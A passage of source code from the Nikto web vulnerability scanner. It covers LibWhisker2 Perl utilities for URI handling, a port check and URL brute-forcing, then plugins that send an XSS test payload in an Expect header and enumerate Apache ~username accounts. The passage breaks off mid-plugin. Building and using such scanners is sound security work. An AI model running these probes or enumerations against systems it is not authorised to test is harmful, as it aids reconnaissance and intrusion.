$$hr{whisker}->{uri_password} = $res[7];\n        }\n        else { delete $$hr{whisker}->{uri_password}; }\n    }\n\n    return @res;\n}\n\n#################################################################\n\n=item B<uri_join>\n\nParams: @vals\n\nReturn: $url\n\nTakes the @vals array output from http_split_uri, and returns a single\nscalar/string with them joined again, in the form of:\nprotocol://user:pass@host:port/uri?params#frag\n\n=cut\n\nsub uri_join {\n    my @V = @_;\n    my $URL;\n\n    $URL .= $V[1] . ':' if defined $V[1];\n    if ( defined $V[2] ) {\n        $URL .= '//';\n        if ( defined $V[6] ) {\n            $URL .= $V[6];\n            $URL .= ':' . $V[7] if defined $V[7];\n            $URL .= '@';\n        }\n        $URL .= $V[2];\n    }\n\n    if ( $V[3] > 0 ) {\n        my $no = 0;\n        $no++ if ( $V[3] == 80  && defined $V[1] && $V[1] eq 'http' );\n        $no++ if ( $V[3] == 443 && defined $V[1] && $V[1] eq 'https' );\n        $URL .= ':' . $V[3] if ( !$no );\n    }\n\n    $URL .= $V[0];\n    $URL .= '?' . $V[4] if defined $V[4];\n    $URL .= '#' . $V[5] if defined $V[5];\n    return $URL;\n}\n\n#################################################################\n\n=item B<uri_absolute>\n\nParams: $uri, $base_uri [, $normalize_flag ]\n\nReturn: $absolute_uri\n\nDouble checks that the given $uri is in absolute form (that is,\n\"http://host/file\"), and if not (it's in the form \"/file\"), then\nit will append the given $base_uri to make it absolute.  This\nprovides a compatibility similar to that found in the URI\nsubpackage.\n\nIf $normalize_flag is set to 1, then the output will be passed\nthrough uri_normalize before being returned.\n\n=cut\n\nsub uri_absolute {\n    my ( $uri, $buri, $norm ) = @_;\n    return undef if ( !defined $uri || !defined $buri );\n\n    return $uri if ( $uri =~ m#^[-+.a-z0-9A-Z]+://# );\n\n    if ( substr( $uri, 0, 1 ) eq '/' ) {\n        if ( $buri =~ m#^[-+.a-z0-9A-Z]+://# ) {\n            my @p = uri_split($buri);\n            $buri = \"$p[1]://$p[2]\";\n            $buri .= \":$p[3]\" if ( ($p[1] eq 'http' && $p[3] != 80) ||\n            \t($p[1] eq 'https' && $p[3] != 443) );\n\n            #\t\t\t$buri.='/';\n        }\n        else {    # ah suck, base URI isn't absolute...\n            return $uri;\n        }\n    }\n    else {\n        $buri =~ s/[?#].*$//;    # remove params and fragments\n        $buri .= '/' if ( $buri =~ m#^[a-z]+://[^/]+$#i );\n        $buri =~ s#/[^/]*$#/#;\n    }\n\n    return uri_normalize(\"$buri$uri\")\n      if ( defined $norm && $norm > 0 );\n    return $buri . $uri;\n}\n\n#################################################################\n\n=item B<uri_normalize>\n\nParams: $uri [, $fix_windows_slashes ]\n\nReturn: $normalized_uri [ undef on error ]\n\nTakes the given $uri and does any /./ and /../ dereferencing in\norder to come up with the correct absolute URL.  If the $fix_\nwindows_slashes parameter is set to 1, all \\ (back slashes) will\nbe converted to / (forward slashes).\n\nNon-http/https URIs return an error.\n\n=cut\n\nsub uri_normalize {\n    my ( $host, $uri, $win ) = ( '', @_ );\n\n    $uri =~ tr#\\\\#/# if ( defined $win && $win > 0 );\n\n    if ( $uri =~ s#^([-+.a-z0-9A-Z]+:)## ) {\n        return undef if ( $1 ne 'http:' && $1 ne 'https:' );\n        $host = $1;\n        return undef unless ( $uri =~ s#^(//[^/]+)## );\n        $host .= $1;\n    }\n    return \"$host/\" if ( $uri eq '' || $uri eq '/' );\n\n    # fast path check\n    return \"$host$uri\" if ( index( $uri, '/.' ) < 0 );\n\n    my $extra = '';\n    $extra = $1 if($uri =~ s/([?#].*)$//);    # remove params and fragments\n\n    # parse order/steps as defined in RFC 1808\n    1 while ( $uri =~ s#/\\./#/# || $uri =~ s#//#/# );\n    $uri =~ s#/\\.$#/#;\n    1 while ( $uri =~ s#[^/]+/\\.\\./## );\n    1 while ( $uri =~ s#^/\\.\\./#/# );\n    $uri =~ s#[^/]*/\\.\\.$##;\n    $uri ||= '/';\n    return $host . $uri . $extra;\n}\n\n#################################################################\n\n=item B<uri_get_dir>\n\nParams: $uri\n\nReturn: $uri_directory\n\nWill take a URI and return the directory base of it, i.e. /rfp/page.php\nwill return /rfp/.\n\n=cut\n\nsub uri_get_dir {\n    my ( $w, $URL ) = ( 0, shift );\n\n    return undef if ( !defined $URL );\n    $URL = substr( $URL, 0, $w ) if ( ( $w = index( $URL, '#' ) ) >= 0 );\n    $URL = substr( $URL, 0, $w ) if ( ( $w = index( $URL, '?' ) ) >= 0 );\n    return $URL if ( substr( $URL, -1, 1 ) eq '/' );\n\n    if ( ( $w = rindex( $URL, '/' ) ) >= 0 ) {\n        $URL = substr( $URL, 0, $w + 1 );\n    }\n    else {\n        $URL = '';\n    }\n    return $URL;\n}\n\n#################################################################\n\n=item B<uri_strip_path_parameters>\n\nParams: $uri [, \\%param_hash]\n\nReturn: $stripped_uri\n\nThis function removes all URI path parameters of the form\n\n /blah1;foo=bar/blah2;baz\n\nand returns the stripped URI ('/blah1/blah2').  If the optional\nparameter hash reference is provided, the stripped parameters\nare saved in the form of 'blah1'=>'foo=bar', 'blah2'=>'baz'.\n\nNote: only the last value of a duplicate name is saved into the\nparam_hash, if provided.  So a $uri of '/foo;A/foo;B/' will result\nin a single hash entry of 'foo'=>'B'.\n\n=cut\n\nsub uri_strip_path_parameters {\n    my ( $uri, $hr ) = @_;\n    my $s   = 0;\n    $s++ if ( defined $hr && ref($hr) );\n\n    my @p = split( /\\//, $uri, -1 );\n    map {\n        if (s/;(.*)$//) { $$hr{$_} = $1 if ($s); }\n    } @p;\n\n\t\treturn join( '/', @p );\n}\n\n#################################################################\n\n=item B<uri_parse_parameters>\n\nParams: $parameter_string [, $decode, $multi_flag ]\n\nReturn: \\%parameter_hash\n\nThis function takes a string in the form of:\n\n foo=1&bar=2&baz=3&foo=4\n\nAnd parses it into a hash.  In the above example, the element 'foo'\nhas two values (1 and 4).  If $multi_flag is set to 1, then the\n'foo' hash entry will hold an anonymous array of both values.\nOtherwise, the default is to just contain the last value (in this\ncase, '4').\n\nIf $decode is set to 1, then normal hex decoding is done on the\ncharacters, where needed (both the name and value are decoded).\n\nNote: if a URL parameter name appears without a value, then the\nvalue will be set to undef.  E.g. for the string \"foo=1&bar&baz=2\",\nthe 'bar' hash element will have an undef value.\n\n=cut\n\nsub uri_parse_parameters {\n    my ( $str, $decode, $multi ) = @_;\n    my %P;\n    if( $str !~ tr/=&// ){\n    \t$P{$str} = undef;\n    \treturn \\%P;\n    }\n\n    $multi  ||= 0;\n    $decode ||= 0;\n    foreach ( split( /&/, $str ) ) {\n        my ( $name, $value ) = split( /=/, $_, 2 );\n        if ($decode) {\n            $name  = uri_unescape($name);\n            $value = uri_unescape($value);\n        }\n        if ( defined $P{$name} && $multi ) {\n            if ( ref( $P{$name} ) ) { push @{ $P{$name} }, $value; }\n            else { $P{$name} = [ $P{$name}, $value ]; }\n        }\n        else {\n            $P{$name} = $value;\n        }\n    }\n    return \\%P;\n}\n\n#################################################################\n\n=item B<uri_escape>\n\nParams: $data\n\nReturn: $encoded_data\n\nThis function encodes the given $data so it is safe to be used in URIs.\n\n=cut\n\nsub uri_escape {\n    my $data = shift;\n    return undef if ( !defined $data );\n    $data =~ s/\\%/\\%25/g;\n    $data =~ s/([+?&=#;@\\\\\\/])/sprintf(\"%%%02x\",ord($1))/eg;\n    $data =~ tr/ /+/;\n    $data =~ s/([^!-~])/sprintf(\"%%%02x\",ord($1))/eg;\n    return $data;\n}\n\n#################################################################\n\n=item B<uri_unescape>\n\nParams: $encoded_data\n\nReturn: $data\n\nThis function decodes the given $data out of URI format.\n\n=cut\n\nsub uri_unescape {\n    my $data = shift;\n    return undef if ( !defined $data );\n    $data =~ tr/+/ /;\n    $data =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack(\"C\",hex($1))/eg;\n    return $data;\n}\n\n#################################################################\n\n\n########################################################################\n\n=item B<utils_recperm>\n\nParams: $uri, $depth, \\@dir_parts, \\@valid, \\&func, \\%track, \\%arrays, \\&cfunc\n\nReturn: nothing\n\nThis is a special function which is used to recursively-permutate through\na given directory listing.  This is really only used by whisker, in order\nto traverse down directories, testing them as it goes.  See whisker 2.0 for\nexact usage examples.\n\n=cut\n\n# '/', 0, \\@dir.split, \\@valid, \\&func, \\%track, \\%arrays, \\&cfunc\nsub utils_recperm {\n    my ( $d, $p, $pp, $pn, $r, $fr, $dr, $ar, $cr ) = ( '', shift, shift, @_ );\n    $p =~ s#/+#/#g;\n    if ( $pp >= @$pn ) {\n        push @$r, $p if &$cr( $$dr{$p} );\n    }\n    else {\n        my $c = $$pn[$pp];\n        if ( $c !~ /^\\@/ ) {\n            utils_recperm( $p . $c . '/', $pp + 1, @_ )\n              if ( &$fr( $p . $c . '/' ) );\n        }\n        else {\n            $c =~ tr/\\@//d;\n            if ( defined $$ar{$c} ) {\n                foreach $d ( @{ $$ar{$c} } ) {\n                    if ( &$fr( $p . $d . '/' ) ) {\n                        utils_recperm( $p . $d . '/', $pp + 1, @_ );\n                    }\n                }\n            }\n        }\n    }\n}\n\n#################################################################\n\n=item B<utils_array_shuffle>\n\nParams: \\@array\n\nReturn: nothing\n\nThis function will randomize the order of the elements in the given array.\n\n=cut\n\nsub utils_array_shuffle {    # fisher yates shuffle....w00p!\n    my $array = shift;\n    my $i;\n    for ( $i = @$array ; --$i ; ) {\n        my $j = int rand( $i + 1 );\n        next if $i == $j;\n        @$array[ $i, $j ] = @$array[ $j, $i ];\n    }\n}    # end array_shuffle, from Perl Cookbook (rock!)\n\n#################################################################\n\n=item B<utils_randstr>\n\nParams: [ $size, $chars ]\n\nReturn: $random_string\n\nThis function generates a random string between 10 and 20 characters\nlong, or of $size if specified.  If $chars is specified, then the\nrandom function picks characters from the supplied string.  For example,\nto have a random string of 10 characters, composed of only the characters\n'abcdef', then you would run:\n\n utils_randstr(10,'abcdef');\n\nThe default character string is alphanumeric.\n\n=cut\n\nsub utils_randstr {\n    my $str;\n    my $drift = shift || ( ( rand() * 10 ) % 10 ) + 10;\n\n    # 'a'..'z' doesn't seem to work on string assignment :(\n    my $CHARS = shift\n      || 'abcdefghijklmnopqrstuvwxyz'\n      . 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n      . '0123456789';\n\n    my $L = length($CHARS);\n    for ( 1 .. $drift ) {\n        $str .= substr( $CHARS, ( ( rand() * $L ) % $L ), 1 );\n    }\n    return $str;\n}\n\n#################################################################\n\n=item B<utils_port_open>\n\nParams: $host, $port\n\nReturn: $result\n\nQuick function to attempt to make a connection to the given host and\nport.  If a connection was successfully made, function will return true\n(1).  Otherwise it returns false (0).\n\nNote: this uses standard TCP connections, thus is not recommended for use\nin port-scanning type applications.  Extremely slow.\n\n=cut\n\nsub utils_port_open {    # this should be platform-safe\n    my ( $target, $port ) = @_;\n\n    return 0 if ( !defined $target || !defined $port );\n    return 0 if ( !defined $Socket::VERSION );\n\n    if ( !( socket( S, PF_INET, SOCK_STREAM, 0 ) ) ) { return 0; }\n    if ( connect( S, sockaddr_in( $port, inet_aton($target) ) ) ) {\n        close(S);\n        return 1;\n    }\n    else { return 0; }\n}\n\n#################################################################\n\n=item B<utils_lowercase_keys>\n\nParams: \\%hash\n\nReturn: $number_changed\n\nWill lowercase all the header names (but not values) of the given hash.\n\n=cut\n\nsub utils_lowercase_keys {\n    my $href = shift;\n\n    return if ( !( defined $href && ref($href) ) );\n\n    my $count = 0;\n    while ( my ( $key, $val ) = each %$href ) {\n        if ( $key =~ tr/A-Z// ) {\n            $count++;\n            delete $$href{$key};\n            $$href{ lc($key) } = $val;\n        }\n    }\n    return $count;\n}\n\n#################################################################\n\n=item B<utils_find_lowercase_key>\n\nParams: \\%hash, $key\n\nReturn: $value, undef on error or not exist\n\nSearches the given hash for the $key (regardless of case), and\nreturns the value. If the return value is placed into an array, the\nwill dereference any multi-value references and return an array of\nall values.\n\nWARNING!  In scalar context, $value can either be a single-value\nscalar or an array reference for multiple scalar values.  That means\nyou either need to check the return value and act appropriately, or\nuse an array context (even if you only want a single value).  This is\nvery important, even if you know there are no multi-value hash keys.\nThis function may still return an array of multiple values even if\nall hash keys are single value, since lowercasing the keys could result\nin multiple keys matching.  For example, a hash with the values\n{ 'Foo'=>'a', 'fOo'=>'b' } technically has two keys with the lowercase\nname 'foo', and so this function will either return an array or array\nreference with both 'a' and 'b'.\n\n=cut\n\nsub utils_find_lowercase_key {\n    return utils_find_key( $_[0], $_[1], 1 );\n}\n\n#################################################################\n\n=item B<utils_find_key>\n\nParams: \\%hash, $key\n\nReturn: $value, undef on error or not exist\n\nSearches the given hash for the $key (case-sensitive), and\nreturns the value. If the return value is placed into an array, the\nwill dereference any multi-value references and return an array of\nall values.\n\n=cut\n\nsub utils_find_key {\n    my ( $href, $key, $dolower ) = ( shift, shift, shift || 0 );\n\n    return undef if ( !( defined $href && ref($href) ) );\n    return undef if ( !defined $key );\n\n    if ($dolower) {\n        $key = lc($key);\n        my ( $k, $v );\n\t\t\t\tmy @match;\n        while ( ( $k, $v ) = each %$href ) {\n            if ( lc($k) eq $key ) {\n                if( ref($v) ) {\n                    push @match, @$v;\n                } else {\n                    push @match, $v;\n                }\n            }\n        }\n        return @match if wantarray();\n        return \\@match if( ~~@match > 1 );\n        return $match[0];\n    }\n    else {\n        return @{ $href->{$key} } if ( ref( $href->{$key} ) && wantarray() );\n        return $href->{$key};\n    }\n    return undef;\n}\n\n#################################################################\n\n=item B<utils_delete_lowercase_key>\n\nParams: \\%hash, $key\n\nReturn: $number_found\n\nSearches the given hash for the $key (regardless of case), and\ndeletes the key out of the hash if found.  The function returns\nthe number of keys found and deleted (since multiple keys can\nexist under the names 'Key', 'key', 'keY', 'KEY', etc.).\n\n=cut\n\nsub utils_delete_lowercase_key {\n    my ( $href, $key ) = ( shift, lc(shift) );\n\n    return undef if ( !( defined $href && ref($href) ) );\n    return undef if ( !defined $key );\n\n    my $deleted = 0;\n    foreach ( keys %$href ) {\n        if ( lc($_) eq $key ) {\n            delete $href->{$_};\n            $deleted++;\n        }\n    }\n    return $deleted;\n}\n\n#################################################################\n\n=item B<utils_getline>\n\nParams: \\$data [, $resetpos ]\n\nReturn: $line (undef if no more data)\n\nFetches the next \\n terminated line from the given data.  Use\nthe optional $resetpos to reset the internal position pointer.\nDoes *NOT* return trialing \\n.\n\n=cut\n\n{\n    my $POS = 0;\n\n    sub utils_getline {\n        my ( $dr, $rp ) = @_;\n\n        return undef if ( !( defined $dr && ref($dr) ) );\n        $POS = $rp if ( defined $rp );\n\n        my $where = index( $$dr, \"\\x0a\", $POS );\n        return undef if ( $where == -1 );\n\n        my $str = substr( $$dr, $POS, $where - $POS );\n        $POS = $where + 1;\n\n        return $str;\n    }\n}\n\n#################################################################\n\n=item B<utils_getline_crlf>\n\nParams: \\$data [, $resetpos ]\n\nReturn: $line (undef if no more data)\n\nFetches the next \\r\\n terminated line from the given data.  Use\nthe optional $resetpos to reset the internal position pointer.\nDoes *NOT* return trialing \\r\\n.\n\n=cut\n\n{\n    my $POS = 0;\n\n    sub utils_getline_crlf {\n        my ( $dr, $rp ) = @_;\n\n        return undef if ( !( defined $dr && ref($dr) ) );\n        $POS = $rp if ( defined $rp );\n\n        my $tpos = $POS;\n        while (1) {\n            my $where = index( $$dr, \"\\x0a\", $tpos );\n            return undef if ( $where == -1 );\n\n            if ( substr( $$dr, $where - 1, 1 ) eq \"\\x0d\" ) {\n                my $str = substr( $$dr, $POS, $where - $POS - 1 );\n                $POS = $where + 1;\n                return $str;\n            }\n            else {\n                $tpos = $where + 1;\n            }\n        }\n    }\n}\n\n#################################################################\n\n=item B<utils_save_page>\n\nParams: $file, \\%response\n\nReturn: 0 on success, 1 on error\n\nSaves the data portion of the given whisker %response hash to the\nindicated file.  Can technically save the data portion of a\n%request hash too.  A file is not written if there is no data.\n\nNote: LW does not do any special file checking; files are opened\nin overwrite mode.\n\n=cut\n\nsub utils_save_page {\n    my ( $file, $hr ) = @_;\n    return 1 if ( !ref($hr) || ref($file) );\n    return 0\n      if ( !defined $$hr{'whisker'}\n        || !defined $$hr{'whisker'}->{'data'} );\n    open( OUT, \">$file\" ) || return 1;\n    binmode(OUT); # Stupid Windows\n    print OUT $$hr{'whisker'}->{'data'};\n    close(OUT);\n    return 0;\n}\n\n#################################################################\n\n=item B<utils_getopts>\n\nParams: $opt_str, \\%opt_results\n\nReturn: 0 on success, 1 on error\n\nThis function is a general implementation of GetOpts::Std.  It will\nparse @ARGV, looking for the options specified in $opt_str, and will\nput the results in %opt_results.  Behavior/parameter values are\nsimilar to GetOpts::Std's getopts().\n\nNote: this function does *not* support long options (--option),\noption grouping (-opq), or options with immediate values (-ovalue).\nIf an option is indicated as having a value, it will take the next\nargument regardless.\n\n=cut\n\nsub utils_getopts {\n    my ( $str, $ref ) = @_;\n    my ( %O, $l );\n    my @left;\n\n    return 1 if ( $str =~ tr/-:a-zA-Z0-9//c );\n\n    while ( $str =~ m/([a-z0-9]:{0,1})/ig ) {\n        $l = $1;\n        if ( $l =~ tr/://d ) {\n            $O{$l} = 1;\n        }\n        else { $O{$l} = 0; }\n    }\n\n    while ( $l = shift(@ARGV) ) {\n        push( @left, $l ) && next if ( substr( $l, 0, 1 ) ne '-' );\n        push( @left, $l ) && next if ( $l eq '-' );\n        substr( $l, 0, 1 ) = '';\n        if ( length($l) != 1 ) {\n            %$ref = ();\n            return 1;\n        }\n        if ( $O{$l} == 1 ) {\n            my $x = shift(@ARGV);\n            $$ref{$l} = $x;\n        }\n        else { $$ref{$l} = 1; }\n    }\n\n    @ARGV = @left;\n    return 0;\n}\n\n#################################################################\n\n=item B<utils_text_wrapper>\n\nParams: $long_text_string [, $crlf, $width ]\n\nReturn: $formatted_test_string\n\nThis is a simple function used to format a long line of text for\ndisplay on a typical limited-character screen, such as a unix\nshell console.\n\n$crlf defaults to \"\\n\", and $width defaults to 76.\n\n=cut\n\nsub utils_text_wrapper {\n    my ( $out, $w, $str, $crlf, $width ) = ( '', 0, @_ );\n    $crlf  ||= \"\\n\";\n    $width ||= 76;\n    $str .= $crlf if ( $str !~ /$crlf$/ );\n    return $str if ( length($str) <= $width );\n    while ( length($str) > $width ) {\n        my $w1 = rindex( $str, ' ',  $width );\n        my $w2 = rindex( $str, \"\\t\", $width );\n        if ( $w1 > $w2 ) { $w = $w1; }\n        else { $w = $w2; }\n        if ( $w == -1 ) {\n            $w = $width;\n        }\n        else { substr( $str, $w, 1 ) = ''; }\n        $out .= substr( $str, 0, $w, '' );\n        $out .= $crlf;\n    }\n    return $out . $str;\n}\n\n#################################################################\n\n=item B<utils_bruteurl>\n\nParams: \\%req, $pre, $post, \\@values_in, \\@values_out\n\nReturn: Nothing (adds to @out)\n\nBruteurl will perform a brute force against the host/server specified in\n%req.  However, it will make one request per entry in @in, taking the\nvalue and setting $hin{'whisker'}->{'uri'}= $pre.value.$post.  Any URI\nresponding with an HTTP 200 or 403 response is pushed into @out.  An\nexample of this would be to brute force usernames, putting a list of\ncommon usernames in @in, setting $pre='/~' and $post='/'.\n\n=cut\n\nsub utils_bruteurl {\n    my ( $hin, $upre, $upost, $arin, $arout ) = @_;\n    my ( $U, %hout );\n\n    return if ( !( defined $hin   && ref($hin) ) );\n    return if ( !( defined $arin  && ref($arin) ) );\n    return if ( !( defined $arout && ref($arout) ) );\n    return if ( !defined $upre  || length($upre) == 0 );\n    return if ( !defined $upost || length($upost) == 0 );\n\n    http_fixup_request($hin);\n\n    map {\n        ( $U = $_ ) =~ tr/\\r\\n//d;\n        next if ( $U eq '' );\n        if (\n            !http_do_request( $hin, \\%hout, { 'uri' => $upre . $U . $upost } ) )\n        {\n            if (   $hout{'whisker'}->{'code'} == 200\n                || $hout{'whisker'}->{'code'} == 403 )\n            {\n                push( @{$arout}, $U );\n            }\n        }\n    } @$arin;\n}\n\n#################################################################\n\n=item B<utils_join_tag>\n\nParams: $tag_name, \\%attributes\n\nReturn: $tag_string [undef on error]\n\nThis function takes the $tag_name (like 'A') and a hash full of\nattributes (like {href=>'http://foo/'}) and returns the\nconstructed HTML tag string (<A href=\"http://foo\">).\n\n=cut\n\nsub utils_join_tag {\n    my ( $name, $href ) = @_;\n    return undef if ( !defined $name || $name eq '' );\n    return undef if ( !defined $href || !ref($href) );\n    my ( $out, $k, $v ) = ( \"<$name\", '', '' );\n    while ( ( $k, $v ) = each %$href ) {\n        next if ( $k eq '' );\n        $out .= \" $k\";\n        $out .= \"=\\\"$v\\\"\" if ( defined $v );\n    }\n    $out .= '>';\n    return $out;\n}\n\n#################################################################\n\n=item B<utils_request_clone>\n\nParams: \\%from_request, \\%to_request\n\nReturn: 1 on success, 0 on error\n\nThis function takes the connection/request-specific values from the\ngiven from_request hash, and copies them to the to_request hash.\n\n=cut\n\nsub utils_request_clone {\n    my ( $from, $to ) = @_;\n    return 0 if ( !defined $from || !ref($from) );\n    return 0 if ( !defined $to   || !ref($to) );\n    return 0 if ( !defined $from->{whisker}->{MAGIC} );\n\n    %$to = ();\n\n    # copy headers\n    my ( $k, $v );\n    while ( ( $k, $v ) = each(%$from) ) {\n        next if ( $k eq 'whisker' );\n        if ( ref($v) ) {\n            @{ $to->{$k} } = @$v;\n        }\n        else {\n            $to->{$k} = $v;\n        }\n    }\n\n    # copy whisker control values\n    $to->{whisker} = {};\n    while ( ( $k, $v ) = each( %{ $from->{whisker} } ) ) {\n        if ( ref($v) ) {\n            @{ $to->{whisker}->{$k} } = @$v;\n        }\n        else {\n            $to->{whisker}->{$k} = $v;\n        }\n    }\n\n    return 1;\n}\n\n#################################################################\n\n=item B<utils_request_fingerprint>\n\nParams: \\%request [, $hash ]\n\nReturn: $fingerprint [undef on error]\n\nThis function constructs a 'fingerprint' of the given request by\nusing a cryptographic hashing function on the constructed original\nHTTP request.\n\nNote: $hash can be 'md5' (default) or 'md4'.\n\n=cut\n\nsub utils_request_fingerprint {\n    my ( $href, $hash ) = @_;\n    $hash ||= 'md5';\n    return undef if ( !defined $href || !ref($href) );\n    return undef if ( !defined $href->{whisker}->{MAGIC} );\n\n    my $data = '';\n    if ( $href->{whisker}->{MAGIC} == 31339 ) {    # LW2 request\n        $data = http_req2line($href);\n        if ( $href->{whisker}->{version} ne '0.9' ) {\n            $data .= http_construct_headers($href);\n            $data .= $href->{whisker}->{raw_header_data}\n              if ( defined $href->{whisker}->{raw_header_data} );\n            $data .= $href->{whisker}->{http_eol};\n            $data .= $href->{whisker}->{data}\n              if ( defined $href->{whisker}->{data} );\n        }                                          # http 0.9 support\n\n        return 'md5:' . md5($data) if ( $hash eq 'md5' );\n        return 'md4:' . md4($data) if ( $hash eq 'md4' );\n    }\n\n    return undef;\n}\n\n#################################################################\n\n=item B<utils_flatten_lwhash>\n\nParams: \\%lwhash\n\nReturn: $flat_version [undef on error]\n\nThis function takes a %request or %response libwhisker hash, and\ncreates an approximate flat data string of the original request/\nresponse (i.e. before it was parsed into components and placed\ninto the libwhisker hash).\n\n=cut\n\nsub utils_flatten_lwhash {\n    my $hr = shift;\n    return undef if ( !defined $hr || !ref($hr) );\n    my $out;\n\n    if ( $hr->{whisker}->{MAGIC} == 31339 ) {\n        $out = http_req2line($hr);\n    }\n    elsif ( $hr->{whisker}->{MAGIC} == 31340 ) {\n        $out = http_resp2line($hr);\n    }\n    else {\n        return undef;\n    }\n\n    $out .= http_construct_headers($hr);\n    $out .= $hr->{whisker}->{http_eol} || \"\\x0d\\x0a\";\n    if ( defined $hr->{whisker}->{data}\n        && length( $hr->{whisker}->{data} ) > 0 )\n    {\n        $out .= $hr->{whisker}->{data};\n    }\n\n    return $out;\n}\n\n#################################################################\n\nsub _utils_carp_common {\n\tmy ($x,$pack,$m) = (0, shift || '',join('',@_) || '(Unknown error)');\n\tmy @s = caller($x++);\n\t@s=caller($x++) while(defined $s[0] && ($s[0] eq 'LW2' || $s[0] eq $pack));\n\treturn $m if !defined $s[0];\n\treturn \"$m at $s[1] line $s[2]\\n\";\n}\n\n=item B<utils_carp>\n\nParams: [ $package_name ]\n\nReturn: nothing\n\nThis function acts like Carp's carp function.  It warn's with the file and\nline number of user's code which causes a problem.  It traces up the call\nstack and reports the first function that is not in the LW2 or optional\n$package_name package package.\n\n=cut\n\nsub utils_carp {\n\twarn _utils_carp_common(@_);\n}\n\n=item B<utils_croak>\n\nParams: [ $package_name ]\n\nReturn: nothing\n\nThis function acts like Carp's croak function.  It die's with the file and\nline number of user's code which causes a problem.  It traces up the call\nstack and reports the first function that is not in the LW2 or optional\n$package_name package package.\n\n=cut\n\nsub utils_croak {\n\tdie _utils_carp_common(@_);\n}\n\n\n=back\n\n=head1 SEE ALSO\n\nL<LWP>\n\n=head1 COPYRIGHT\n\nCopyright 2009 Jeff Forristal\n\n=cut\n\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_apache_expect_xss.plugin",
    "content": "#VERSION,2.04\n###############################################################################\n#  Copyright (C) 2008 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Test Apache's expect header XSS\n###############################################################################\nsub nikto_apache_expect_xss_init {\n    my $id = {\n        name      => \"apache_expect_xss\",\n        full_name => \"Apache Expect XSS\",\n        author    => \"Sullo\",\n        description =>\n          \"Checks whether the web servers has a cross-site scripting vulnerability through the Expect: HTTP header\",\n        hooks     => { scan => { method => \\&nikto_apache_expect_xss, }, },\n        copyright => \"2008 Chris Sullo\"\n        };\n    return $id;\n}\n\nsub nikto_apache_expect_xss {\n    return if $mark->{'terminate'};\n    my ($mark) = @_;\n    my %headers = ('Expect', '<script>alert(xss)</script>');\n    my ($code, $content, $errors, $request, $response) = nfetch($mark, \"/\", \"GET\", \"\", \\%headers, \"\", \"apache_expect_xss\");\n\n    if ($content =~ /<script>alert\\(xss\\)<\\/script>/) {\n\t add_vulnerability($mark, \"Apache is vulnerable to XSS via the Expect header\", 999974, 27487, \"GET\", \"/\", $request, $response);\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_apacheusers.plugin",
    "content": "#VERSION,2.06\n###############################################################################\n#  Copyright (C) 2004 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Apache user enumeration\n###############################################################################\n\nsub nikto_apacheusers_init {\n    my $id = {\n            name        => \"apacheusers\",\n            full_name   => \"Apache Users\",\n            author      => \"Javier Fernandez-Sanguinoi Pena\",\n            description => \"Checks whether we can enumerate usernames directly from the web server\",\n            hooks       => { scan => { method => \\&nikto_apacheusers, }, },\n            copyright   => \"2008 Chris Sullo\",\n            options     => {\n                         enumerate  => \"Flag to indicate whether to attempt to enumerate users\",\n                         dictionary => \"Filename for a dictionary file of users\",\n                         size       => \"Maximum size of username if bruteforcing\",\n                         home       => \"Look for ~user to enumerate\",\n                         cgiwrap    => \"User cgi-bin/cgiwrap to enumerate\"\n                         }\n              };\n    return $id;\n}\n\nsub nikto_apacheusers {\n    return if $mark->{'terminate'};\n    my ($mark, $parameters) = @_;\n    my $apacheusers = 0;\n\n    # First ensure that the server is vulnerable\n    my ($result, $content) = nfetch($mark, \"/~bin\", \"GET\", \"\", \"\", \"\", \"apacheusers: known user\");\n\n    $content = quotemeta($content);\n    if ($content =~ /forbidden/i)    # good on \"root\"\n    {\n        my ($result, $content, $errors, $request, $response) = nfetch($mark, \"/~\" . LW2::utils_randstr(8), \"GET\", \"\", \"\", \"\", \"apacheusers: invalid user\");\n\n        $content = quotemeta($content);\n        if ($content !~ /forbidden/i)    # Good, it gave an error instead of forbidden\n        {\n            add_vulnerability($mark, \"Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).\", 999999, 637, \"GET\", \"/~bin\", $request, $response);\n        }\n        $apacheusers = 1;\n    }\n\n    # If we can't enumerate users then return\n    return unless ($apacheusers == 1);\n\n    # If we haven't been asked to enumerate users then return\n    return unless (defined $parameters->{'enumerate'}\n                   && $parameters->{'enumerate'} == 1);\n\n    # Now we can attempt to enumerate the users\n    my ($url, $dictfile, $size);\n    my @cgiwraps;\n    my @cfgcgi = split(/ /, $VARIABLES{\"\\@CGIDIRS\"});\n\n    if (defined $parameters->{'dictionary'}) {\n        $dictfile = $parameters->{'dictionary'};\n    }\n    if (defined $parameters->{'size'}) {\n        $size = $parameters->{'size'};\n    }\n\n    # Set the URL according to the parameters\n    if (defined $parameters->{'cgiwrap'}) {\n\n        # Check for existence of cgiwrap\n        foreach my $cgidir (@CFGCGI) {\n            my $curl = \"$cgidir\" . \"cgiwrap\";\n            my ($result, $content) = nfetch($mark, $curl, \"GET\", \"\", \"\", \"\", \"user_enum_apache: cgiwrap\");\n            if ($content =~ /check your URL/i) {\n                push(@cgiwraps, \"$curl\");\n            }\n        }\n\n        foreach my $cgiwrap (@cgiwraps) {\n            $url = \"$cgiwrap/~\";\n\n            # First check 